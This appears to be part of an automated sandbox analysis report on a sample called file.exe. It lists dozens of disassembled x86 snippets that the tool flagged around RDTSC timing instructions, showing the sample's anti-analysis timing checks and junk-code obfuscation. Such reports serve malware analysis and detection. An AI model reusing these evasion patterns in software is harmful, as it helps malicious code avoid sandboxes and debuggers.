          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D5DF second address: 95D67E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF74D778E5h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 js 00007FAF74D778DCh 0x00000016 and ebx, dword ptr [ebp+122D2EF8h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FAF74D778D8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1FB2h], ecx 0x0000003e jmp 00007FAF74D778E1h 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FAF74D778D8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FAF74D778E6h 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F5E4 second address: 95F5F5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E7C2 second address: 95E7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E8D1 second address: 95E8ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D8F598h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960727 second address: 96072C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9607C8 second address: 9607CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9607CE second address: 9607D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962645 second address: 962657 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAF74D8F588h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961757 second address: 96177D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FAF74D778DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96177D second address: 961782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96188C second address: 9618A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E7h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964F2A second address: 964FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FAF74D8F58Dh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jnc 00007FAF74D8F58Ch 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FAF74D8F588h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov bx, ax 0x00000041 mov eax, dword ptr [ebp+122D0D39h] 0x00000047 sbb bx, 6DB2h 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FAF74D8F588h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c push esi 0x0000006d pop esi 0x0000006e pop edx 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964FAB second address: 964FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E2h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 965F61 second address: 965F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CBA0 second address: 96CBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF74D778DDh 0x0000000b jmp 00007FAF74D778E1h 0x00000010 jmp 00007FAF74D778E5h 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CBDA second address: 96CBF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF74D8F598h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CE6A second address: 96CE78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CE78 second address: 96CE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973B20 second address: 973B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973B24 second address: 973B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973B46 second address: 973B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FAF74D778D8h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FAF74D778E2h 0x00000014 push ecx 0x00000015 jmp 00007FAF74D778DAh 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979F02 second address: 979F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979131 second address: 979137 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979137 second address: 97913F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9792DA second address: 9792DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9792DE second address: 9792E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97945A second address: 97946C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DCh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97946C second address: 979472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979472 second address: 979478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979478 second address: 97947C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9795D7 second address: 9795E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9795E2 second address: 97960B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jng 00007FAF74D8F586h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979765 second address: 97977F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF74D778E1h 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97977F second address: 9797A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D8F590h 0x00000009 jmp 00007FAF74D8F58Fh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979900 second address: 979930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007FAF74D778E8h 0x0000000b jmp 00007FAF74D778E1h 0x00000010 pop esi 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979930 second address: 97993A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF74D8F58Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979AA3 second address: 979AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FAF74D778D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979AB5 second address: 979AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979AB9 second address: 979ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 je 00007FAF74D778D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979ACB second address: 979B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F591h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF74D8F58Ch 0x00000018 jmp 00007FAF74D8F58Dh 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D373 second address: 97D377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D377 second address: 97D393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943E87 second address: 943EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778E4h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007FAF74D778DCh 0x00000011 lea eax, dword ptr [ebp+12478BCDh] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FAF74D778D8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 pushad 0x00000032 popad 0x00000033 xor dword ptr [ebp+122D2DA3h], eax 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007FAF74D778D8h 0x00000042 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943EE6 second address: 92BFEE instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF74D8F590h 0x00000008 jmp 00007FAF74D8F58Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D215Dh], edi 0x00000019 mov bl, 10h 0x0000001b popad 0x0000001c xor ecx, dword ptr [ebp+122D2CEAh] 0x00000022 call dword ptr [ebp+122D3227h] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jns 00007FAF74D8F586h 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944314 second address: 944334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FAF74D778D6h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944422 second address: 944426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94458A second address: 9445AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FAF74D778E7h 0x0000000f jmp 00007FAF74D778E1h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94464C second address: 9446C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FAF74D8F590h 0x00000010 jmp 00007FAF74D8F596h 0x00000015 nop 0x00000016 push eax 0x00000017 pushad 0x00000018 jmp 00007FAF74D8F597h 0x0000001d jmp 00007FAF74D8F58Fh 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jo 00007FAF74D8F59Bh 0x0000002d jmp 00007FAF74D8F595h 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944785 second address: 944789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944789 second address: 9447C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnp 00007FAF74D8F5A5h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAF74D8F593h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9447C6 second address: 9447CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9447CA second address: 9447F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007FAF74D8F597h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944887 second address: 9448A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9448A3 second address: 9448B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF74D8F58Bh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945119 second address: 9451C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAF74D778DDh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e movzx ecx, ax 0x00000011 lea eax, dword ptr [ebp+12478C11h] 0x00000017 adc dx, 1BF3h 0x0000001c nop 0x0000001d push edx 0x0000001e jp 00007FAF74D778E1h 0x00000024 pop edx 0x00000025 push eax 0x00000026 jmp 00007FAF74D778E2h 0x0000002b nop 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007FAF74D778D8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 jnl 00007FAF74D778D8h 0x0000004c lea eax, dword ptr [ebp+12478BCDh] 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007FAF74D778D8h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000019h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f js 00007FAF74D778DCh 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9451C3 second address: 9451C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DC54 second address: 97DC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DC58 second address: 97DC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FAF74D8F586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FAF74D8F590h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DEE3 second address: 97DEFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778E1h 0x00000009 je 00007FAF74D778D6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DEFE second address: 97DF5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FAF74D8F586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FAF74D8F590h 0x00000012 jnl 00007FAF74D8F586h 0x00000018 jmp 00007FAF74D8F595h 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 jmp 00007FAF74D8F597h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c jne 00007FAF74D8F586h 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E089 second address: 97E0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778E8h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9817C4 second address: 9817DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAF74D8F586h 0x0000000a jmp 00007FAF74D8F590h 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9817DF second address: 9817E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98696E second address: 986974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986974 second address: 9869AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FAF74D778E8h 0x00000010 jmp 00007FAF74D778E5h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986B1D second address: 986B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FAF74D8F586h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986EF5 second address: 986F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986F0B second address: 986F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98703D second address: 98706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007FAF74D778DDh 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 jno 00007FAF74D778DCh 0x00000016 pushad 0x00000017 js 00007FAF74D778D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98706A second address: 987070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9872BD second address: 9872C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9872C3 second address: 9872DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF74D8F590h 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 987889 second address: 98788D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98788D second address: 9878B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F591h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FAF74D8F586h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FAF74D8F586h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9878B8 second address: 9878BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9878BC second address: 9878C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9878C2 second address: 9878CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FBF4 second address: 98FBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FBFA second address: 98FC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAF74D778DEh 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC13 second address: 98FC18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC18 second address: 98FC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FAF74D778DEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 jmp 00007FAF74D778DCh 0x00000017 pushad 0x00000018 popad 0x00000019 push esi 0x0000001a pop esi 0x0000001b jmp 00007FAF74D778DAh 0x00000020 popad 0x00000021 jnc 00007FAF74D778DEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
